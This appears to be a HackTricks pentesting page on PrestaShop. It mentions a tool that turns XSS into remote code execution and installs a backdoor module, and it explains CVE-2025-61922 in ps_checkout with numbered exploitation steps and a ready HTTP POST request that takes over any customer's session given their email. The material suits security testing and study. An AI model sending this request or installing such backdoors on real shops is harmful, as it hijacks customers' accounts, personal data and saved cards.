PrestaShop

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

From XSS to RCE

  • PrestaXSRF: a PrestaShop exploitation script that escalates an XSS into RCE or other critical vulnerabilities. For more details see this post. It supports PrestaShop versions 8.X.X and 1.7.X.X and provides:
  • (RCE) PSUploadModule(); - Upload a custom module: installs a persistent module (backdoor) into PrestaShop.

ps_checkout ExpressCheckout silent login account takeover (CVE-2025-61922)

Missing identity validation in the ps_checkout module < 5.0.5 lets an unauthenticated attacker switch their session to that of any customer simply by supplying the customer's email address.

  • Endpoint (unauth): POST /module/ps_checkout/ExpressCheckout.
  • Flow: ExpressCheckout.php receives the attacker's JSON, validates only orderID, builds an ExpressCheckoutRequest and calls ExpressCheckoutAction::execute().
  • Auth bug: in vulnerable versions ExpressCheckoutAction calls CustomerAuthenticationAction::execute() whenever no user is logged in. That method only does customerExists(<payer_email>) followed by context->updateCustomer(new Customer($id)), so the mere existence of the email == login (no password or token is checked).
  • Attacker-controlled email field: order.payer.email_address in the JSON payload is what ExpressCheckoutRequest::getPayerEmail() reads.

Exploitation steps

  1. Obtain the email address of any registered customer (admin accounts are separate and are not affected by this flow).
  2. Send an unauthenticated POST to the controller with an orderID and the victim's email in order.payer.email_address.
  3. Even if the endpoint returns a 500, the response carries the victim customer's context cookies (the session has already been swapped), giving access to their PII or the ability to purchase with saved cards.

POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: <target>
Content-Type: application/json
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"victim@example.com"}}}

